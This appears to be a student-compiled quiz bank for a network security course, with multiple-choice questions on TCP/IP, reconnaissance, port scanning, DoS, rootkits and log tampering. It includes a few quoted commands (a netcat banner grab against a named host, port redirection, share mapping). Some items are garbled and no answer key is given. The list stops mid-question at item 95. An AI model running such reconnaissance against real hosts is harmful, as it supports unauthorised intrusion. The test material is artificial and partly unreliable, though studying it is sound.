NETWORK VULNERABILITY & SECURITY TOOLS (ET0521)

59 questions quiz For MST Chapter 1 to Chapter 6

1.Which of the following is the best method for preventing social engineering attacks? 

a) User Education
b) Security Tokens

c) Biometric devices
d) Encryption


2.When a browser trying to contact a web server, the client OS dynamically assigns a source port value of _____.
a) less than 1024
b) greater than 80
c) greater than 1023
d) greater than 1024

3.The following are commonly used techniques for reconnaissance except ______. 

a) low-technology reconnaissance
b) web searches
c) whois database analysis
d) High performance hardware

4.An attacker with low skill level is called ______? 

a) cracker

b) hacker

c) script kiddle

d) Phreaker

5._____ is the interception of network data not intended for the machine that is intercepting the traffic.

a) Packet Sniffing

b) Packet Spoofing

c) Packet Stealing

d) Packet Engineering

6.Which of the following software is a good port scanning tool?

a) Telnet

b) Nmap

c) ipconfig

d) portscan

7.Which of the following protocols is responsible for addressing hosts in a TCP/IP –based network?

a) TCP

b) UDP

c) DHCP

d) IP

8.what does an attacker do in Reconnaissance Phase ?

i. An attacker seeks to gather as much information as possible about a target of evaluation prior to launching an attack.

ii. The Core of Reconnaissance attack is intrusive information gathering techniques.

iii. System is breached or accessed in order to retrieve information.

a) I only:

b) I and ii:

c) I , ii and iii;

d) None of the above

9. In order to determine which class any IP address is in, one should examine the first ____ bits of the IP address.

a) 8bits

b) 3bits

c) 4bits

d) 5bits

10. IP addresses beginning with 127 decimal are reserved for ___________.

a) unknown class

b) reserved for loopback

c) for external testing

d) for future use

11. Which of the following statements is FALSE ?

a) TCP Packet includes two port numbers a source port and a destination port.

b) A TCP port with listening service is known as an reserved port

c) The TCP port number is a 16-bit numbers.

d) There are 65536 different TCP ports on each machines.

12. Which of the following SuperScan’s tool is used to uncover the users account list at the target machine?

a) User account Exploit

b) User Engineering

c) Windows Enumeration

d) Windows User Exploit

13.Which of the following are the basic types of hackers attack ?

i. Denial of Service Attack

ii. Repudiation Attack

iii. Access Attack

iv. Modification Attack

a) I, ii and iii;

b) I, ii and iv;

c) I, iii and iv;

d) I, ii, iii and iv;

14. The transmission control protocol/internet protocol ( TCP/IP ) protocol that handles outgoing mail using port 25 is _____.

a) Simple Mail Transfer Protocol ( SMTP )

b) Post Office Protocol (POP)

c) Internet Mail Access Protocol (IMAP)

d) Secure/Multi Purpose Internet Mail Extensions (S/MIME )

15. Which of the following troubleshooting utilities is common to all operating systems and is used for testing connectivity of two hosts on a network?

a) Tracert

b) ipconfig

c) ping

d) nslookup

16. Ethereal is a software tool used to ____ between client and server machine.

a) test the physical connection

b) test the functionality of Ethernet adaptors

c) observe the packets sent and received

d) transfer data and files

17. Sending an e-mail from one address but making it seem as if it is coming from another is called ______.

a) falsifying

b) telneting

c) exploiting

d) spoofing

18. Each of the following is an OSI Model protocol layer except ______.

a) Software

b) Transport

c) Network

d) Physical

19. The following are methods employed to uncover system vulnerabilities except ______.

a) IP Address Scanning

b) Manual Vulnerability probing

c) Traffic Monitoring

d) Vulnerability Scanning

20. Nmap is able to provide the following types of scanning except ______.

a) TCP Connect

b) TCP SYN

c) Password Scanning

d) UDP Connect

21. The objectives of port scanning are to identify the following except ______.

a) Hardware model number

b) Open ports

c) Host operating system

d) Software or service versions

22. Each machine with a TCP/IP stack has ______ TCP ports and ______ UDP ports.

a) 65536 and 65536

b) 32768 and 32768

c) 32768 and 65536

d) 65536 and 32768

23. In TCP header, there are TCP control bits, also know as the TCP flags.

a) 6

b) 7

c) 8

d) 9

24. Which of the following is the correct sequence for OSI (Open Systems Interconnection) seven layers?

a) Physical Layer, Data Link Layer, Network Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer 

b) Physical Layer, Network Layer, Data Link Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer

c) Physical Layer, Data Link Layer, Transport Layer, Network Layer, Session Layer, Presentation Layer and Application Layer

d) Physical Layer, Network Layer, Transport Layer, Data Link Layer, Session Layer, Presentation Layer and Application Layer

25. Which of the following is FALSE about User Datagram Protocol (UDP)?

a) It is connection protocol

b) Packet transmitted does not put in order

c) No packet lost retransmission

d) No acknowledgement or session tear down required

26. When a threat uses vulnerability to attack a resource, some severe consequences can result in

i. Loss of Confidentiality

ii. Loss of Integrity

iii. Loss of Availability

a) i and ii;

b) ii and iii;

c) i, ii and iii;

d) None of the above.

27. Which of the following statements are TRUE about Computer Misuse Act (Cap 50A)?

i. Any police officer may arrest without warrant any person reasonably suspected of committing an offence under this Act

ii. Any person who knowingly causes a computer to perform any function for the purpose of securing access without authority to any program or data held in any computer shall be guilty of an offence

iii. Any person who causes a computer to perform any function for the purpose of securing access to any program or data held in any computer with intent to commit an offence to which this section applies shall be guilty of an offence.

iv. Any person who does any act which he knows will cause an unauthorised modification of the contents of any computer shall be guilty of an offence

a) i, ii and iii;

b) i, ii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv.

28. Which of the following statements is FALSE about Risk Management?

a) Risk can be qualitatively defined in three levels: Low, Medium and High

b) Risk Management is about Security

c) Risk management determines the value of the resources and the level of security for it

d) Threat + Vulnerability = Risk

29. IP resides at which layer of the OSI model?

a) Application

b) Data Link

c) Network

d) Physical

30. The TCP/IP adheres roughly to the following protocol layers except _________.
a) Physical (Layer 1)

b) Network (Layer 3)

c) Transport (Layer 4)

d) Little interaction with Data Link ( Layer 2 )

31. When a browser surfs the Internet, which of the following is the correct order flow of data through the communication layers?
a) Network -> Data -> Physical -> Transport

b) Transport -> Data -> Physical -> Network

c) Network -> Transport -> Physical -> Data

d) Transport -> Network -> Data -> Physical

32. Which of the following are TRUE about a Script Kiddie?

i. With low-level hacking skills

ii. Use released tools and software to exploit without understanding the underlying vulnerability

iii. Biggest group of attackers and usually rather immature

iv. Use Social Engineering technique

a) i, ii and iii;

b) i, ii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv

33. Which of the following is the outcome of an Access Attack?

a) It is an attack against the confidentiality of the information

b) It is an attack against the integrity of information

c) It causes information to be unavailable

d) It is an attack against the accountability of information

34. A person who applies his hacking skills for offensive purpose is known as

a) Cracker

b) White Hat

c) Ethical Hacker

d) Phreaker

35. Which information directory protocol is the standard for file transfer over the Internet?

a) TCP

b) UDP

c) FTP

d) HTTP

36. What is the information can be gathered by an attacker by typing the following command using Netcat?

C:> nc www.sp.edu.sg 80 <press Enter>

HEAD / HTTP/1.0 <press Enter>

<press Enter>

a) Domain Name

b) Web Server version

c) Administrative Contact Number

d) Netblock Owner

37. Internet is “managed” by

a) APNIC

b) ICANN

c) AfriNIC

d) ARIN

38. The most important elements of Google’s technology are:

i. The Google bots

ii. The Google index

iii. The Google cache

iv. The Google API

a) i, ii and iii;

b) i, ii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv.

39. General types of reconnaissance data can be obtained from Internet are:

i. Employee data

ii. Business partner

iii. Existing technologies

iv. Financial information

a) i, ii and iii;

b) i, ii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv.

40. Without even touching a computer, an attacker might be able to gain very sensitive information about an organisation through

i. Social Engineering;

ii. Physical Break-in;

iii. War Dialling;

iv. Dumpster Diving.

a) i, ii and iii;

b) i, ii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv.

41. Which of the following measures can be used to defend against Network Mapping?

i. Filter out the underlying message that network mapping tools rely on by using firewalls and the packet filtering router;

ii. Block incoming ICMP message;

iii. Filter ICMP_TIME_EXCEEDED messages leaving your network to stymie an attacker using traceroute;

iv. To prevent an attacker from discovering open ports on your machine is to close all unused ports

a) i and ii;

b) ii and iii;

c) i, ii and iii;

d) i, ii, iii and iv

42. The objectives of port scanning are generally to identify one or more of the following:

i. Open ports

ii. Host operating system

iii. Software or service versions

iv. Vulnerable software versions

a) i, ii and iii;

b) i, iii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv

43. Which of the following is FALSE?

a) TCP Connect is also know as Full Open Scan;

b) TCP SYN is also know as Half Open Scan;

c) TCP SYN Port Scanning completes the three-way handshake;

d) TCP SYN Port Scanning is stealthier than TCP Connect scans

44. The exploitation of resources can be performed in many ways. Some of the more common ways are:

i. Technical Vulnerability Exploitation

ii. Denial of Service

iii. Information Gathering

iv. Social Engineering

a) i and ii;
b) i, ii and iii;
c) ii, iii and iv;
d) i, ii, iii and iv;

45. What is the name of the unique physical address that is assigned to every network interface card?

a) IP address

b) Hostname

c) MAC address

d) NetBIOS name

46. Which of the following protocols transmit sensitive information in clear text?

a) FTP and Telnet

b) FTP and TCP

c) Telnet and TCP

d) TCP and ARP

47. TCP/IP family of protocols includes several components

i. Transmission Control Protocol (TCP);

ii. User Datagram Protocol (UDP);

iii. Internet Protocol (IP);

iv. Internet Control Message Protocol (ICMP)

a) i, ii and iii;

b) i, iii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv

48. For Information Gathering Methodology under Publicly Available Information, what is the common information an attacker looks for?

i. Names

ii. Emails

iii. Technologies

iv. Current Events / Recent Happenings

a) i, ii and iii;

b) i, iii and iv;

c) ii, iii and iv;

d) i, ii, iii and iv

49. Which of the following statement is FALSE about ICMP (Internet Control Message Protocol)?

a) ICMP was essentially designed for the troubleshooting of routing and connectivity issues in IP networks

b) ICMP “mapping” is often conducted via a ping sweep

c) ICMP manipulates the time-to-live (TTL) option in UDP packets (should be TraceRoute)

d) ICMP message types reply from the target provide a great deal of information to hackers about host connectivity and the hop count to a particular system

50. Which of the following information cannot generally be found from the target’s Internet Registrar?

a) Administrative, technical, and billing contact names

b) Customer information

c) Company’s postal addresses

d) Telephone numbers

51. Each of the following protocols can be used by TCP for transmissions over the Internet except _________.

a) Internet Transfer Protocol (ITP)

b) HyperText Transfer Protocol (HTTP)

c) File Transfer Protocol (FTP)

d) Post Office Protocol (POP)

52. Which of the following is the correct sequence of phases of hacker’s attack?

a) Reconnaissance, Gaining Access, Maintaining Access, Scanning, Clearing Tracks;

b) Scanning, Reconnaissance, Gaining Access, Maintaining Access, Clearing Tracks;

c) Reconnaissance, Maintaining Access, Scanning, Gaining Access, Clearing Tracks;

d) Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks;

53. Which of the following is NOT a defence against Physical Break-in Attack?

a) All computer users must be trained not to give sensitive information away to friendly callers

b) A guard at front door or install a card reader for facility accessing

c) Educate employees about the dangers of letting people in the building without checking their credentials

d) Use automatic password-protected screen savers

54. The premise behind reconnaissance activities is to profile the following except _________.

a) size of organisation

b) administrative staff

c) network infrastructure

d) an organisation operations

55. Which of the following statements is FALSE about the key terms used in the risk management process?

a) A Resource is anything in an environment that trying to protect

b) A Threat is a resouce can be accessed by making use of a vulnerability in your environment

c) A Vulnerable is a point where a resource is susceptible to attack

d) Countermeasures are deployed to counteract threats and vulnerabilities, therefore reducing the risk in your environment

56. Which of the following is not a well known TCP port number?
a) 8888

b) 53

c) 80

d) 25

57. Which of the following Hacker Class is also known as “Cracker”?
a) Grey Hats

b) Red Hats

c) Black Hats

d) White Hats

58. Which of the following NOT common activity for Scanning?
a) War Dialling

b) Network Mapping

c) Port Scanning

d) Dumpster Diving

59. Internet search engines are used by attacker because they provide the following facilities except ________.

a) Internet directories

b) Link crawlers

c) Caches

d) Hyperlinks



*Overall there are 75 Quiz (most of the quiz is not here are from chapter 5 & 6) Known all port number as well
PORT 21 FTP PORT 23 Telnet
PORT 25 SMTP
PORT 53 DNS/Domain
PORT 80 HTTP/Web



255 questions quiz For Final Exam Topic 1 to Topic 11

1 .Which of the followings are TRUE about Smurf Attack?
i. Smurf attack also known as directed broadcast attack
ii. Smurf attacks rely on a directed broadcast to create a flood of traffic for a victim
iii. A perpetrator sends a large amount of ICMP echo (ping) traffic at IP broadcast addresses, all of it having a spoofed source address of a victim


a) i and ii;
b) i and iii;
c) ii and iii;
d) i, ii and iii.

2. The purpose of port scanning is systematically scan for range of ____.
a) opened ports at the target system.
b) closed ports at the target system.
c) protected ports at the target system.
d) active ports that are running application services at the target system.

3. What is hybrid password cracking?
a) crack password by guessing every possible combination of characters.
b) crack password based on dictionary form.
c) crack password by using a combination of limited dictionary cracks and brute force cracking.
d) crack password based on hybrid characters.

4. A type of software that repairs security flaws in an application is called a(n) ________.
a) hot fix
b) exploit
c) repair
d) patch

5. Which of the following troubleshooting utilities is common to all operating systems and is used for testing connectivity of two hosts on a network?
a) tracert
b) ipconfig
c) ping
d) nslookup

6. Which of the following protocols is responsible for addressing hosts in a TCP/IP-based network?
a) TCP
b) UDP
c) DHCP
d) IP

7. The following are methods employed to uncover system vulnerabilities except ______.
a) IP Address scanning
b) Manual vulnerability probing
c) Traffic monitoring
d) Vulnerability scanning

8. Which of the following statements are TRUE about Computer Misuse Act (Cap 50A)?
i. Any police officer may arrest without warrant any person reasonably suspected of committing an offence under this Act
ii. Any person who knowingly causes a computer to perform any function for the purpose of securing access without authority to any program or data held in any computer shall be guilty of an offence
iii. Any person who causes a computer to perform any function for the purpose of securing access to any program or data held in any computer with intent to commit an offence to which this section applies shall be guilty of an offence.
iv. Any person who does any act which he knows will cause an unauthorised modification of the contents of any computer shall be guilty of an offence

a. i, ii and iii;
b. i, ii and iv;
c. ii, iii and iv;
d. i, ii, iii and iv.

9. Which of the following event file is used to stores security-related events like failed logon attempts, policy changes, and attempts to access files without proper permission in Windows system?
a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

10. Which of the followings are the common techniques used by sophisticated hacker for covering track and hiding in a compromised system? i. Hiding evidence by altering event logs; ii. Creating difficult to find files and directories; iii. Hiding evidence on the network: Covert Channels; iv. Deleting log files.
a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

11. Which of the following NOT common activity for Scanning?
a) War Dialling
b) Network Mapping
c) Port Scanning
d) Dumpster Diving

12. Which of the following is the correct sequence for OSI (Open Systems Interconnection) seven layers?

a) Physical Layer, Data Link Layer, Network Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer
b) Physical Layer, Network Layer, Data Link Layer, Transport Layer, Session Layer, Presentation Layer and Application Layer
c) Physical Layer, Data Link Layer, Transport Layer,
Network Layer, Session Layer, Presentation Layer and Application Layer
d) Physical Layer, Network Layer, Transport Layer, Data Link Layer, Session Layer, Presentation Layer and Application Layer

13. Which application analyses surfer's shopping habits, interests and inserts Pop-up advertisement?
a) Remote Control Programs
b) Bots
c) Gaobot
d) Spyware

14. Which method is NOT used as maintaining access attacks?
a) Trojan Horses
b) Big Worms
c) Backdoors
d) Rootkits

15. A situation in which a program or process attempts to store more data in a temporary data storage area than it was intended to hold is known as a what?
a) Buffer overflow
b) Denial of service
c) Distributed denial of service
d) Storage overrun

16. The following are payloads provided by Metasploit to foist on the target machine except _____.
a) Create new user accounts
b) Bind shell to current port
c) Windows VNC Server DLL Inject
d) Inject DLL into running application

17. Which information directory protocol is the standard for file transfer over the Internet?
a. TCP
b. UDP
c. FTP
d. HTTP

18. Which of the following is Not the correct defense method against User-Mode Rootkits?

a)Never let attackers get Administrator right to the system.
b) Install MD5 & SHA-1.
c) Install Tripwire.
d) Install latest operating system patches.

19. If the attack is SYN flood, which of the following category of Denial-of-Service attack it belong to?
a) Locally stopping services
b) Remotely stopping services
c) Locally exhausting resources
d) Remotely exhausting resources

20. Identify which category of Denial-of-Service attack if the attack is Smurf.
a) Locally stopping services
b) Remotely stopping services
c) Locally exhausting resources
d) Remotely exhausting resources

21. Which of the following is the correct sequence of phases of hacker’s attack?
a. Reconnaissance, Gaining Access, Maintaining Access, Scanning, Clearing Tracks;
b. Scanning, Reconnaissance, Gaining Access, Maintaining Access, Clearing Tracks;
c. Reconnaissance, Maintaining Access, Scanning, Gaining Access, Clearing Tracks;
d. Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks;

22. Ethereal is a software tool used to ______ between client and server machine.
a) test the physical connection
b) test the functionality of ethernet adaptors
c) observe the packets sent and received
d) transfer data and files

23. The TCP/IP adheres roughly to the following protocol layers except _________.
a) Physical (Layer 1)
b) Network (Layer 3)
c) Transport (Layer 4)
d) little interaction with Data Link (Layer 2)

24. Which of the following information cannot generally be found from the target’s Internet Registrar?
a) Administrative, technical, and billing contact names
b) Customer information
c) Company’s postal addresses
d) Telephone numbers

25. Which of the following is not one of the IP address ranges reserved for private use by RFC 1918?
a) 10.0.0.0-10.255.255.255
b) 192.168.0.0-192.168.255.255
c) 169.254.0.0-169.254.255.255
d) 172.16.0.0-172.31.255.255

Question 26 4 points Save An attacker can gain access to very sensitive information about an organisation through the following except _________.
a) Social engineering
b) Physical break-in
c) Dumpster diving
d) software engineering

27. What is the information can be gathered by an attacker by typing the
following command using Netcat? C:> nc www.sp.edu.sg 80 <press Enter> HEAD / HTTP/1.0 <press Enter> <press Enter>
a. Domain Name
b. Web Server version
c. Administrative Contact Number
d. Netblock Owner

28. For DoS (Denial-of-Service) Attack, Resource Exhaustion can be achieved by: i. Spawning processes to fill the process table ii. Filling up the whole file system iii. Packet floods iv. Malformed packet attacks
a) i, ii and iii;
b) i, ii and iv;
c) i, iii and iv;
d) i, ii, iii and iv;

29. What type of attack attempts to use every possible key until the correct key is found?
a) Brute-force attack
b) Denial-of-service attack
c) Passive attack
d) Private key cryptography

30. Which of the following protocols should be disabled on a critical network device such as a router?
a) TCP/IP.
b) ICMP.
c) IPX/SPX.
d) RIP

31. Sending an e-mail from one address but making it seem as if it is coming from another is called ______________.
a) falsifing
b) telneting
c) exploiting
d) spoofing

32. The most important elements of Google’s technology are:
i. The Google bots
ii. The Google index
iii. The Google cache
iv. The Google API

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

33. Which of the following is a correct definition of a Trojan?
a) It needs no user intervention to replicate.
b) It sends messages to a computer with an IP address indicating that the message is coming from a trusted host.
c) It collects personal information or changes your computer configuration without appropriately obtaining prior consent.
d)It buries itself in the operating system software and infects other systems only after a user executes the application that it is buried in.

34. Password cracking involves _________________ .
a) stealing the encrypted password representations and trying to recover the original clear text password using an automated tool.
b) mounting a keylogger software in a computer to capture typed password.
c) guessing password using an automated tool.
d) password decrypting using an automated tool.

35. Which of the following is NOT a Distributed Denial-of-Service defenses?
a) Packet filtering Firewalls at DMZ
b) Limits Bandwidth
c) use egress Anti-Spoofing filters
d) Traffic shaping

36. Which one of the following best describes the type of attack designed to bring a network to a halt by flooding the systems with useless traffic?
a) DoS
b) Ping of death
c) Teardrop
d) Social engineering

37. Which of the following event file is used to stores events associated with application e.g. database, Web servers or user applications in Windows system?
a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

38. Windows s events information is constantly being written into:
i. SECURITY.LOG ;
ii. FILE.LOG;
iii. APPLICATION.LOG;
iv. SYSTEM.LOG.

a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

39. Most Application-layer protocols only use UDP or TCP at the Transport layer. Which of the following could use both?
a) TCP
b) Microsoft Word
c) Telnet
d) DNS

40. Which of the following is Not a feature of Windows User-Mode Rootkits?

a) Hiding files, processes, system services, system drivers, Registry keys and TCP/UDP ports.
b) Creating a remotely accessible command-shell backdoor, made invisible on the local system.
c) Activate the hidden system processes.
d) Lying to users about how much free space is available on the hard drive.

41. Which one of the following is not true about a web server?
a) The default port for a web server is port 80.
b) A web server must always run on port 80.
c) A commonly used alternate port for web servers is 8080.
d) The browser client must specify the port if not using well-known port 80.

42. A(n) _______ is a manner of manipulating software to result in undesired behaviour.
a) exploit
b) heap overflow
c) external probing
d) buffer overflow

43. Which of the following are the basic types of hackers attack?
i. Denial of Service Attack
ii. Repudiation Attack
iii. Access Attack
iv. Modification Attack

a. i, ii and iii;
b. i, ii and iv;
c. i, iii and iv;
d. i, ii, iii and iv.

44. Which of the following event file is used to stores events associated with the systems functioning e.g. failure of a driver or inability of a service to start in Windows system?

a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

45. Which of the following protocol does Ethereal indicate when pinging a computer?
a) Internet Control Message Protocol (ICMP)
b) Address Resolution Protocol (ARP)
c) Transmission Control Protocol(TCP)
d) Domain Name System (DNS)

46. The exploitation of resources can be performed in many ways. Some of the more common ways are:
i. Technical Vulnerability Exploitation
ii. Denial of Service
iii. Information Gathering
iv. Social Engineering

a. i and ii;
b. i, ii and iii;
c. ii, iii and iv;
d. i, ii, iii and iv.

47. Which of the following is the type of algorithm used by MD5?
a) Block cipher algorithm
b) Hashing algorithm
c) Asymmetric encryption algorithm
d) Cryptographic algorithm

48. Which are the other three of the SIX common techniques can be applied to mount an effective defence against the attacks from having the ability to alter logs?
 Activate Logging
 Setting Proper Permissions
 Using a Separate Logging Server

i. Encrypting Log Files
ii. Making Log Files Append Only
iii. Protecting Log Files Using Write-once Media
iv. Renaming Log Files

a) i, ii and iii;
b) i, ii and iv;
c) i, iii and iv;
d) ii, iii and iv.

49. What is the meaning of Anonymizing HTTP Proxy?
a) Allow the attacker to surf the web as an anonymous user.
b) Allow the attacker to surf the Web without revealing the attacker's location.
c) Allow the attacker to surf the web without revealing the attacker's user account.
d) Allow the attacker to surf the web without revealing the attacker's HTTP sequence number

50. Which of the following is FALSE?
a) TCP Connect is also know as Full Open Scan;
b) TCP SYN is also know as Half Open Scan;
c) TCP SYN Port Scanning completes the three-way handshake;
d) TCP SYN Port Scanning is stealthier than TCP Connect scans.

51. IP addresses beginning with 127 decimal are reserved for ___________.
a) unknown class
b) reserved for loopback
c) for external testing
d) for future use

52. Each of the following protocols can be used by TCP for transmissions over the Internet except _________.
a) Internet Transfer Protocol (ITP)
b) HyperText Transfer Protocol (HTTP)
c) File Transfer Protocol (FTP)
d) Post Office Protocol (POP)

53. Consider the situation in which an intervening entity such as a firewall blocks direct access to a target system. Resourceful attackers can find their way around these obstacles using .
a) denial-of-Service
b) port redirection
c) telnet
d) ftp

54. Which of the following is Not the correct method to defense against bots, backdoors & spyware?
a) Use Antivirus and Antispyware Tools
b) Looking for Unusual TCP and UDP ports
c) Knowing Your hardware
d) Knowing Your Software

55. Which of the following is a class C address?
a) 128.10.54.120
b) 92.200.138.24
c) 168.28.10.165
d) 193.10.160.45

56. The most popular techniques for launching packet floods are:
i. Bonk;
ii. SYN floods
iii. Smurf attacks
iv. Distributed DoS attacks

a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

57. What does it mean when running the following command at PC 192.168.1.2? winrelay –lip 192.168.1.2 –lp 4000 –dip 192.168.1.23 –dp 5000 –proto tcp
i. It is a Trojan horse;
ii. PC 192.168.1.2 has been setup to listen to port 4000;
iii. The traffic arrives at port 5000 will be redirected to port 4000;
iv. PC 192.168.1.23 is the destination where the traffic will go to.

a) i and ii;
b) i and iii;
c) ii and iii;
d) ii and iv.

58. Which of the following SuperScan4's tool is used to uncover the users account list?
a) Host and Service Discovery
b) Users Discovery
c) Scan Options
d) Windows Enumeration

59. Starting with Windows XP Service pack 2 and Windows Server 2003 Service Pack 1, Microsoft's OS provides a feature called _____________ to support non-executable stack or heap pabilities.
a) Stack Overflow Prevention
b) Data Execution Prevention
c) Buffer Overflow Prevention
d) Memory Execution Prevention

60. For Information Gathering Methodology under Publicly Available Information, what is the common information an attacker looks for?
i. Names
ii. Emails
iii. Technologies
iv. Current events / Recent happenings

a. i, ii and iii;
b. i, ii and iv;
c. ii, iii and iv;
d. i, ii, iii and iv.

61. Which appllication-level Trojan backdoor is able to grab keystrokes from the user and sending them back sensitive information to the attacker?
a) Remote Control Programs
b) Bots
c) Gaobot
d) Spyware

62. Which of the following is FALSE?
a. There are five Regional Internet Registries (RIR) under Address Supporting Organization
b. Domain name registrations are handled by Internet Corporation for Assigned Names and Numbers (ICANN)
c. Each RIR maintaining a whois database holding details of IP address registrations in their regions
d. ICANN is responsible for coordinating the management of the technical elements of the DNS to ensure universal resolvability so that all users of the Internet can find all valid addresses

63. Which of the following is a known Kernel-Mode Rootkits software tool?
a) FU Rootkit for Windows.
b) KM Rootkit for Windows.
c) SU Rootkit for Windows.
d) KU Rootkit for Windows.

64. Which of the following statement is FALSE about Covert_TCP?
a) The Covert_TCP’s covert channels are constructed by inserting data into unused or misused fields of TCP/IP headers
b) The Covert_TCP’s covert channels are constructed by embedding one protocol entirely in a different protocol
c) Covert_TCP allows for transmitting information by entering ASCII data in TCP/IP header fields
d) TCP/IP header fields used are: IP Identification, TCP sequence number and TPC acknowledgement number

65. Which of the following is NOT a defence against Physical Break-in Attack?
a) All computer users must be trained not to give sensitive information away to friendly callers
b) A guard at front door or install a card reader for facility accessing
c) Educate employees about the dangers of letting people in the building without checking their credentials
d) Use automatic password-protected screen savers

66. Which of the following is commonly found to be a nonessential service on a web server?
a) Server service
b) DNS service
c) FTP service
d) Print spooler service

67. A _____ is an error condition in a software program that allows malicious code to be injected and put into operation without user intervention.
a) syntax overflow
b) semantic overflow
c) buffer overflow
d) software overflow

68. An attacker gathers the following types of reconnaissance data from company's own web site except _________.
a) hardware models
b) business partner
c) existing technologies
d) recent mergers and acquisitions

69. Which of the following is the best way to protect against security vulnerabilities within OS software?
a) Install the latest service pack.
b) Reinstall the OS on a regular basis.
c) Back up the system regularly.
d) Shut down the system when it is not in use.

70. Which of the following is the best method for preventing social engineering attacks?
a) User education
b) Security tokens
c) Biometric devices
d) Encryption

71.Which of the following protocols transmit sensitive information in clear text?
a) FTP and Telnet
b) FTP and TCP
c) Telnet and TCP
d) TCP and ARP

72. Which of the following statements is FALSE?
a) TCP Packet includes two port numbers: a source port and a destination port
b) A TCP port with listening service is known as an reserved port
c) The TCP port number is a 16-bit numbers
d) There are 65,536 different TCP ports on each machines

73. Which of the following statement is FALSE?
a) The .EVT files are “locked” on a running Windows machine, and cannot be opened or edited with a standard file-editing tool
b) On Linux and Unix systems, the vast majority of log files are written in plain ASCII text
c) The main accounting files in Linux and Unix are utmp, wtmp and lastlog files
d) The .EVT files on Windows machine can be opened or edited with a standard file-editing tool

74. Each of the following is an OSI model protocol layer except ______________.
a) Software
b) Transport
c) Network
d) Physical

75. When a browser trying to contact a Web server, the client OS dynamically assigns a source port value of ______.
a) less than 1024.
b) greater than 80.
c) greater than 1023.
d) greater than 1024.

76. The primary goal of information security is to protect ______________.
a) procedures
b) people
c) information
d) products

77. Which of the following event file is the most often targeted because it contains the majority of the events that attackers wants to remove?
a) SECEVENT.EVT
b) SYSEVENT.EVT
c) APPEVENT.EVT
d) FILE.EVT

78. For DoS (Denial-of-Service) Attack, Stopping service means:
a) crashing or shutting off a specific program or machine that users want to access;
b) stopping the computer from booting up;
c) shutting down the computer remotely;
d) stopping the network resource from being accessed.

79. Which is NOT a countermeasure of Buffer Overflow Attacks?
a) avoid sloppy programming
b) configure system with executable stack
c) implement strict control on unnecessary outgoing traffic from the network
d) apply patches to system

80. To protect the privacy of web surfing habits, which of the following should be deleted on a regular basis?
a) Download history
b) SSL certificates
c) Cookies
d) Plug-ins

81. In order to exploit RPC's vulnerability, the attacker would require the ability to send a specially crafted request to which three ports of the remote machine.
a) 135, 139 or 145
b) 21, 23 or 80
c) 21, 135 or 139
d) 135, 139 or 445

82. When a browser surfs the Internet, which of the following is the correct order flow of data through the communication layers?
a) Network -> Data -> Physical -> Transport
b) Transport -> Data -> Physical -> Network
c) Network -> Transport -> Physical -> Data
d) Transport -> Network -> Data -> Physical

83. Which of the following statement is FALSE?
a) Covert channels often rely on technique called tunnelling, which allows one protocol to be carried over another protocol
b) Techniques for establishing covert channels across the network require both a client (attacker system)
and a server (victim system)
c) Loki and Reverse WWW Shell are widely exchanged within the computer underground based on tunnelling covert information techniques
d) Reverse WWW Shell utilises ICMP as a tunnel to carry on interactive communications with the backdoor listener

84.Which of the following is the correct sequence of phases of hackers attack?
a. Reconnaissance, Gaining Access, Maintaining Access, Scanning, Clearing Tracks;
b. Scanning, Reconnaissance, Gaining Access, Maintaining Access, Clearing Tracks;
c. Reconnaissance, Maintaining Access, Scanning, Gaining Access, Clearing Tracks;
d. Reconnaissance, Scanning, Gaining Access, Maintaining Access, Clearing Tracks;

85. You need to allow only secure Internet traffic in and out of your company network. Which of the following ports would you open on the firewall?
a) 22
b) 53
c) 80
d) 443

86. Without even touching a computer, an attacker might be able to gain very sensitive information about an organisation through i. Social Engineering; ii. Physical Break-in; iii. War Dialling; iv. Dumpster Diving.
a) i, ii and iii;
b) i, ii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

87. The attacker had managed to access the target system. Identify the command execution statement of
>net use z: \\192.168.1.2\c$ */u:student
a) check which network is connected to the Z drive of the target system.
b) check whether there is a network "student" which is connected to the z drive of the target system.
c) map the c drive of the target system to the z drive of the attacker.
d) map the attacker system's c drive to the z drive of the target system.

88. The objectives of port scanning are generally to identify one or more of the following: i. Open ports ii. Host operating system iii. Software or service versions iv. Vulnerable software versions (mst)
a) i, ii and iii;
b) i, iii and iv;
c) ii, iii and iv;
d) i, ii, iii and iv.

89. Which of the following is the outcome of an Access Attack?
a. It is an attack against the confidentiality of the information
b. It is an attack against the integrity of information
c. It causes information to be unavailable
d. It is an attack against the accountability of information

90. The TCP/IP adheres roughly to the following protocol layers except _________.
a) Physical (Layer 1)
b) Network (Layer 3)
c) Transport (Layer 4)
d) little interaction with Data Link (Layer 2)

91. When a threat uses vulnerability to attack a resource, some severe consequences can result in
i. Loss of Confidentiality
ii. Loss of Integrity
iii. Loss of Availability

a. i and ii;
b. ii and iii;
c. i, ii and iii;
d. None of the above.

92. Which layer of the OSI model is responsible for code and character-set conversion as well as recognizing data formats?
a) Application
b) Presentation
c) Session
d) Network

93. Nmap is able to provide the following types of scanning except ______.
a) TCP Connect
b) TCP SYN
c) Password Scanning
d) UDP Connect

94. Which of the following Hacker Class is also known as “Cracker”?
a. Grey Hats
b. Red Hats
c. Black Hats
d. White Hats

95. Identify one method to defend against DDoS attack from locally stopping services?
